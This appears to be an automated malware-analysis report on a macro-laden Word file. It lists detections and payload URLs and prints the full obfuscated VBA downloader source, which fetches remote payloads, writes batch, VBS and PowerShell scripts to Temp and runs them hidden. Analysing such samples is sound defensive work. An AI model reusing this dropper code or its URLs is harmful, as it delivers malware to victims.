MALICIOUS
416
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample contains VBA macros with Auto_Open and Shell calls, indicating malicious intent. The script attempts to download payloads from multiple URLs, including http://brianlonchar.com/home/wp-includes/fonts/lns.txt and http://carallianz.com/boilerd/keys/lns.txt, and execute them. This behavior is consistent with a downloader malware.
Heuristics 15
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA macros detected medium 10 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
a = Shell(b, 0) -
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.Matched line in script
a = Shell(b, 0) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set aaT = CreateObject("" + "MS" & "X" + "" + "ML2." & "Ser" & "ver" & "X" & "MLH" & "TT" & "P") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Quick = GetObject(a) -
Payload URL assembled from a Chr()/Asc() string expression (6 URLs) high OLE_VBA_EXPR_DROPPER_URLA VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Environ(a) -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://brianlonchar.com/home/wp-includes/fonts/lns.txt Referenced by macro
- http://brianlonchar.com/home/wp-includes/fonts/89172387.txt123123123Referenced by macro
- http://savepic.su/5756114.jpgReferenced by macro
- http://savepic.su/5747922.jpgReferenced by macro
- http://carallianz.com/boilerd/keys/89172387.txtReferenced by macro
- http://carallianz.com/boilerd/keys/lns.txtReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9377 bytes |
SHA-256: d6b421a22bf7633d5048899d6754c36676b0eca4849ec24d232197c122b6e405 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
73 of 173 identifiers look randomly generated (e.g. 'ahbsjdjqwgdhjqwgjdhgwqhjwgdwqjhd'); 5 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Tyqwfygvdnasvd_Open()
End Sub
Sub Auto_Open()
Guiqwhdqwdbnmsa
End Sub
Sub Ihuqwndqbajshdb()
End Sub
Sub Guiqwhdqwdbnmsa()
Dim asjiw As Integer, jwasssssdas As Integer, mmmilikeit As Integer, asdsssssjqwdq As Integer
Dim huwe, auwd As Integer, aabbb As Integer
Dim retVal As Variant
Dim HPPSDJ As String
YUGQYD = AAS.Ubqhwdhwqbd(16735)
FL2 = YUGQYD
HPPSDJ = "" + "Te" + "mp"
PH2 = AAS.Bad(HPPSDJ) + "\"
mmmilikeit = CInt(YUGQYD)
jwnqdw = 1 - mmmilikeit
JIQWDJQ = 12312312
JIQWDJQ = 1 + 1 + 113 + Sgn(jwnqdw)
AAAA = JIQWDJQ
HYWDAX = "bayeuwgf yeuwf wyeug fwyuegf t"
JWIDJIAAA = ""
HUYFEA = Chr(AAAA - 16) + "a" + Chr(116)
PSFL = FL2 + "" & "." + "p" + "" + Chr(115) _
+ _
"1"
'+ Right(HYWDAX, 1)
SSS = Chr(AAAA + 1)
VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
huwe = 1
BAFL = FL2 + Chr(Sgn(Fix(-22.043)) + 11 + 10 + 25 + huwe + 0) + HUYFEA
INTG = "" & "o" & "bject"
KIWD = Chr(110 + Sgn(Len(BAFL))) + "d" + "" + "ul" + "e"
AFTG = "m" & KIWD
SXEE = Chr(46)
SXAA = Chr(101)
SXE = SXEE & SXAA & "xe"
GNG = ".jpg"
PHT = "" & "ht" & "t" & "p://" & ""
SPIC = "" & "s" & "av" & "epi" + "c.su" + Chr(47)
PSPTH = PH2 + PSFL
VBPTH = PH2 + VBFL
BAPTH = "bas hdguqw gdyqwd qudu ahsjgd hjqgwhdjqgd "
ABPTH = PH2 + BAFL
BAPTH = ABPTH
Dim AAAAHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer
DRT = 315
BFT = 316
CFT = 317
DFT = 318
EFT = 319
Dim PBIn As String, asdwq As String, MIWDWQ As String
CDDD = "89172387.txt"
LNSS = "lns.txt"
STT1 = "brianlonchar.com/home/wp-includes/fonts/"
STT2 = "carallianz.com/boilerd/keys/"
PBIn = PHT + STT1 + CDDD
CONT = AAS.Kace(PBIn)
asdwq = CONT
HQUWDAAA = "0"
If (asdwq = "") Then
PBIn = PHT + STT2 + CDDD
CONT = AAS.Kace(PBIn)
asdwq = CONT
HQUWDAAA = "1"
End If
CONT = AAS.Quqhwdbyas(asdwq)
TVT10 = AAS.Port(CONT, "text10")
TVT20 = AAS.Port(CONT, "text20")
TVT21 = AAS.Port(CONT, "text21")
TVT30 = AAS.Port(CONT, "text30")
TVT31 = AAS.Port(CONT, "text31")
XPT1 = AAS.Port(CONT, "stext1")
XPT2 = AAS.Port(CONT, "stext2")
XPT3 = AAS.Port(CONT, "stext3")
WVR = AAS.Bad("USE" & "RPROFILE")
UQHWDIHQW = "qjwdhjqw hqwgjdg qwhjgdjhqwddg "
hufehu1 = InStr(WVR, "sers\")
Dim hudhw As Integer
Dim ghdAdd(1 To 3)
ghdAdd(1) = "1"
ghdAdd(2) = "0"
ghdAdd(3) = "0"
If (hufehu1 <> 0) Then
ghdAdd(1) = "2"
Else
ghdAdd(2) = "3"
End If
JHWQUD = Join(ghdAdd)
hudhw = Val(JHWQUD)
AAS.WaitFor (1)
MIWDWQ = PHT + STT1 + LNSS
If (HQUWDAAA = "1") Then
MIWDWQ = PHT + STT2 + LNSS
End If
SEXX = AAS.Kace(MIWDWQ)
PSTB = PBIn + "123123123"
MSTAR1 = SPIC + "5756114" + GNG
MSTAR2 = SPIC + "5747922" + GNG
STAR1 = PHT + MSTAR1
STAR2 = PHT + MSTAR2
FFQ = "8"
FF = FFQ + SXE
If (hudhw = 130) Then
Open BAPTH For Output As #DRT
Print #DRT, XPT1
Print #DRT, ":rtqdftqwfdhwgqf" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
Print #DRT, XPT2
Close #DRT
AAS.WaitFor (1)
Open VBPTH For Output As #BFT
Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
Print #BFT, XPT3
Close #BFT
AAS.WaitFor (1)
NTH1 = AAS.Freat(retVal, BAPTH)
End If
If (hudhw = 200) Then
ZPQSKD = FL2
Open PSPTH For Output As #CFT
Print #CFT, "$ujdkwq = 'jqwdb';"
Print #CFT, "$stat = 'ht'+'tp://'+'" + MSTAR2 + "';"
Print #CFT, "$ggtt = '" + SEXX + "';"
Print #CFT, "$pths = '" + PH2 + "';"
Print #CFT, "$wehs = '" + ZPQSKD + "';"
Print #CFT, "$nnm = '" + FFQ + "';"
Print #CFT, TVT10
Close #CFT
Open VBPTH For Output As #DFT
Print #DFT, TVT30
Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&djwq"
Print #DFT, TVT31
Close #DFT
Open BAPTH For Output As #EFT
Print #EFT, "@echo off"
Print #EFT, TVT20
Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
Print #EFT, ":yeuwvhgfwefhj"
Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34) + "%Ads3%"
Print #EFT, TVT21
Close #EFT
AAS.WaitFor (1)
NTH2 = AAS.Freat(retVal, BAPTH)
End If
JUW = Chr(47)
AKK = Chr(60)
ZKK = ">"
NTH3 = AAB.Thwqbdhjabs(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
NTH4 = AAB.Thwqbdhjabs(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
NTH5 = AAB.Thwqbdhjabs(AKK + INTG + ZKK, "", 3)
NTH6 = AAB.Thwqbdhjabs(AKK + JUW + INTG + ZKK, "", 3)
NTH7 = AAB.Thwqbdhjabs(AKK + AFTG + ZKK, "", 3)
NTH8 = AAB.Thwqbdhjabs(AKK + JUW + AFTG + ZKK, "", 3)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
BHYUAGUSGD = "jkqwhduiqwhd iqgwyud yqwgdyuwqg dauksj dowqidjhoq iwdjas djkdhjkas wqd"
CIOQWJDHIUQWD = "qiowueiqhduiqwhd qwhd iqwgd uyasg dhjasg dqwg diuqwgd qiwd jasgd ahjsd "
Auto_Open
DQUWDGYUQWGD = "laksjdo iwqd joqiwhal skjd klqwjh djkqhdjkwqh djkqwhdkjw khwqd"
End Sub
Attribute VB_Name = "AAS"
Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub
Public Function Freat(a As Variant, b)
a = Shell(b, 0)
Freat = a
End Function
Public Function Kace(a As String)
Dim ygwdg As Integer, aaT As Object
Dim ggFw As String
ggFw = a
Set aaT = CreateObject("" + "MS" & "X" + "" + "ML2." & "Ser" & "ver" & "X" & "MLH" & "TT" & "P")
TAFDYQWT = "qwudhqwidgqywgd uqywgd uyqwg uydgd uyqwgdqwg dquw d"
OQJDWIOJQW = " n bjsgduq gwdyuqwg duywqg duyqwgd uyqwqwd quwgd "
aaT.Open "GET", ggFw
BUQWJBDJHW = " nhaushdi usahdu qiwgduyqgd uyqwgduwq dqwgd uqwgd wq"
ADBYWQUDG = "ahbsjdjqwgdhjqwgjdhgwqhjwgdwqjhd hjqwgd hjqwdg "
aaT.Send ""
Kace = aaT.ResponseText
End Function
Public Function Ubqhwdhwqbd(a As Integer)
Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
End Function
Public Function Port(a, b As String)
Dim krd, tent As Integer
UQWD = "<"
NDUW = "" & ">"
krd = InStr(1, a, UQWD + b + NDUW) + 8
tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
KLMN = Mid(a, krd, tent)
HUQHWDA = KLMN
Port = HUQHWDA
End Function
Public Function Quqhwdbyas(ByVal strData As String) As String
Dim objXML As Object
Dim objNode As Object
Set objXML = CreateObject("" & "MSXML2.DOMDocument")
Set objNode = objXML.createElement("b6" + "4")
objNode.DataType = "bin.base64"
objNode.Text = strData
WUDHA = objNode.nodeTypedValue
Quqhwdbyas = WUDHA
Set objNode = Nothing
Set objXML = Nothing
MWDQ = ""
End Function
Public Function Dtgt(a As String)
Quick = GetObject(a)
End Function
Public Function Quick(a As String)
Quick = GetObject(a)
End Function
Public Function Bad(a As String)
Bad = _
Environ(a)
End Function
Attribute VB_Name = "AAB"
Public Function Auwqhdqwud(a As String, b As String, c As Integer)
HBNASVDYQWDVQWD = "jqwdhjqwjhqwg djhqwg djhqwgd jhqwgd q"
End Function
Public Function Thwqbdhjabs(a As String, b As String, c As Integer)
Dim selectedText As String
Dim ytss, selRange As Range
Set ytss = ActiveDocument.Range
With ytss.Find
.Text = a
.MatchWholeWord = True
ytss.Find.Execute
ytss.Collapse direction:=wdCollapseEnd
CBYQGWUQYGDQW = "qywugdyuqwdg yqwg duywqgd uyqwgd uqwdquw "
Set selRange = ActiveDocument.Range
WQDGHQWDFGSAFD = "qwudgqwyudyquwduqw uyd sajhdgasgdjwqhgdjqwd"
selRange.Start = ytss.End
.Text = b
.MatchWholeWord = True
.Execute
ytss.Collapse direction:=wdCollapseStart
selRange.End = ytss.Start
If (c = 1) Then
selectedText = selRange.Delete
End If
If (c = 2) Then
selRange.Font.Color = wdColorBlack
End If
If (c = 3) Then
With ytss.Find
.Text = a
.Replacement.Text = Chr(1 + 1 + 28 + 2)
'BYUWGDQGAD = "NUAHDjsahdjgdj "
'SBYUWGDQGAD = "NUHxzcDjsahdjgdj "
'BXXYUWGDQGAD = "NUHDjasdsahdjgdj "
'BXYUWGDQGAD = "xcNUHDjsahdjgdj "
'BYAUWGDQGAD = "NUHcasDjsahdjgdj "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
End If
End With
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.